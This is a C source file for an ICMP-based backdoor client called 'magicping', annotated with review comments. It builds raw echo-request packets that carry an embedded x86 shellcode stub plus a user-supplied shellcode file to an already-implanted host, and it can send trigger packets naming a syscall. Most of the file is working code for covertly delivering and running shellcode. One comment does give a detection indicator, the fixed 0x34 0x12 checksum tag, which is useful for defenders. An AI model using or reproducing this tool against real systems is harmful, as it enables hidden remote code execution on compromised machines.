#include <stdio.h>
#include <sys/socket.h>
#include <linux/icmp.h>
#include <string.h>
#include <netinet/ip.h>
#include <stdlib.h>
#include <getopt.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
/*
 * 32-bit x86 stub that main() copies to offset 8 of an "install" packet,
 * directly ahead of the bytes read from the -i file. The copy uses
 * sizeof(forker) - 1, so the string literal's trailing NUL is not sent.
 *
 * Original author's description: preserves syscall return code, forks,
 * and parent jumps to original saved EIP.
 *
 * NOTE(review): the code that receives and runs this stub is not part of
 * this file; the per-instruction comments below are the author's
 * disassembly and should be checked against the bytes before relying on them.
 */
static char forker[] =
"\x50" /* push eax */
"\x6a\x02" /* push 0x2 */
"\x58" /* pop eax */
"\xcd\x80" /* int 0x80 */
"\x85\xc0" /* test eax,eax */
"\x74\x13" /* je shellcode (0x13 = the 19 stub bytes that follow, i.e. lands on the appended payload) */
"\x58" /* pop eax */
"\x89\xe3" /* mov ebx,esp */
"\x66\x81\xe3\x00\xf0" /* and bx,0xf000 */
"\x81\xeb\x00\x10\x00\x00" /* sub ebx,0x1000 */
"\x8b\x5b\xfc" /* mov ebx,DWORD PTR [ebx-0x4] */
"\xff\xe3"; /* jmp ebx */
void usage(void)
{
	/* Emit the one-line synopsis on stdout, then end the process with status 1. */
	fputs("Usage: magicping [-i shellcode.o] [-t syscall] destination\n", stdout);
	exit(1);
}
/*
 * Client side of an ICMP-carried control channel.
 *
 * Builds an ICMP echo request in `data` and sends it to the destination
 * address over a raw socket. Two message kinds are supported and may be
 * combined on one command line (install is sent first, then trigger):
 *
 *   -i FILE   "install": data[4] = 0, payload at offset 8 is the forker
 *             stub followed by the contents of FILE.
 *   -t N      "trigger": data[4] = 1, data[5] = N truncated to one byte,
 *             packet length 8.
 *
 * Wire layout as written by this function:
 *   byte 0     ICMP type (ICMP_ECHO)
 *   byte 1     ICMP code (0)
 *   bytes 2-3  0x34 0x12, a fixed tag placed in the checksum field
 *   byte 4     opcode: 0 = install, 1 = trigger
 *   byte 5     syscall number (trigger only)
 *   bytes 6-7  left zero by the memset
 *   byte 8..   install payload
 *
 * Detection note: the checksum field holds a constant instead of a value
 * computed over the packet, so it will generally not match the contents.
 * Echo requests carrying 0x34 0x12 at offset 2 of the ICMP header,
 * regardless of payload, are a matchable network indicator.
 *
 * Returns -1 when the socket or the -i file cannot be used. With no
 * destination argument, usage() exits with status 1.
 */
int main(int argc, char * argv[])
{
int sock, fd, i, ch, install, trigger, syscall;
char *shellcode;
char *ip;
char data[1024];
struct stat st;
struct iovec iov;
struct msghdr m;
struct sockaddr_in saddr;
/* Ancillary data passed to sendmsg(): a single IP_PKTINFO control message
 * whose in_pktinfo body is zero-initialised. */
struct {
struct cmsghdr cm;
struct in_pktinfo ipi;
} cmsg = { {sizeof(struct cmsghdr) + sizeof(struct in_pktinfo),
SOL_IP, IP_PKTINFO}, {0, }};
/* Defaults */
install = trigger = syscall = 0;
/* `shellcode` is only assigned by -i and only read inside `if (install)`.
 * There is no case for getopt's '?' result, so unknown options are ignored. */
while ((ch = getopt(argc, argv, "i:t:h")) != EOF) {
switch (ch) {
case 'i':
install++;
shellcode = optarg;
break;
case 't':
trigger++;
/* NOTE(review): atoi() gives no error indication for non-numeric input. */
syscall = atoi(optarg);
break;
case 'h':
usage();
}
}
argc -= optind;
argv += optind;
if (argc == 0)
usage();
ip = argv[0];
/* Raw ICMP socket; on Linux this normally requires root or CAP_NET_RAW. */
sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
if (sock < 0) {
printf("[*] Failed to open raw socket.\n");
return -1;
}
memset(data, 0, sizeof(data));
memset(&saddr, 0, sizeof(saddr));
memset(&m, 0, sizeof(m));
saddr.sin_family = AF_INET;
/* NOTE(review): the inet_aton() result is not checked, so an unparsable
 * destination leaves sin_addr zeroed. No <arpa/inet.h> or <unistd.h>
 * include is visible for inet_aton/read/close. */
inet_aton(ip, &saddr.sin_addr);
data[0] = ICMP_ECHO; /* type */
data[1] = 0; /* code */
data[2] = 0x34; /* checksum isn't validated, */
data[3] = 0x12; /* use as tag */
/* One iovec over `data`; iov_len is set per message kind below. */
iov.iov_base = data;
m.msg_name = &saddr;
m.msg_namelen = sizeof(saddr);
m.msg_iov = &iov;
m.msg_iovlen = 1;
m.msg_control = &cmsg;
m.msg_controllen = sizeof(cmsg);
if (install) {
data[4] = 0; /* 0 = install */
fd = open(shellcode, O_RDONLY);
if (fd < 0) {
printf("[*] Failed to open %s\n", shellcode);
return -1;
}
/* NOTE(review): the error returns below leave fd and sock open; the process
 * exits right after, so the descriptors are reclaimed by the OS. */
if (fstat(fd, &st)) {
printf("[*] Failed to fstat %s\n", shellcode);
return -1;
}
/* Capacity check: 1024-byte buffer minus the 8-byte header minus the stub
 * (without its NUL). The comparison mixes st_size with a size_t expression. */
if (st.st_size > 1024 - 8 - (sizeof(forker) - 1)) {
printf("[*] Shellcode is too big.\n");
return -1;
}
/* Payload = forker stub immediately followed by the file contents. */
memcpy(&data[8], forker, sizeof(forker) - 1);
/* A single read() is expected to return the whole file; a short read is
 * reported as failure. */
if (read(fd, &data[8 + sizeof(forker) - 1], st.st_size) !=
st.st_size) {
printf("[*] Failed to read shellcode.\n");
return -1;
}
close(fd);
iov.iov_len = 8 + sizeof(forker) - 1 + st.st_size;
/* NOTE(review): the sendmsg() result is ignored, so a failed send is silent. */
sendmsg(sock, &m, 0);
}
if (trigger) {
/* Reuses `data`: after an install in the same run, bytes 8.. still hold the
 * payload, but only the first 8 bytes are sent. */
data[4] = 1; /* 1 = trigger */
data[5] = (char)syscall; /* truncated to a single byte */
iov.iov_len = 8;
/* NOTE(review): the sendmsg() result is ignored here as well. */
sendmsg(sock, &m, 0);
}
}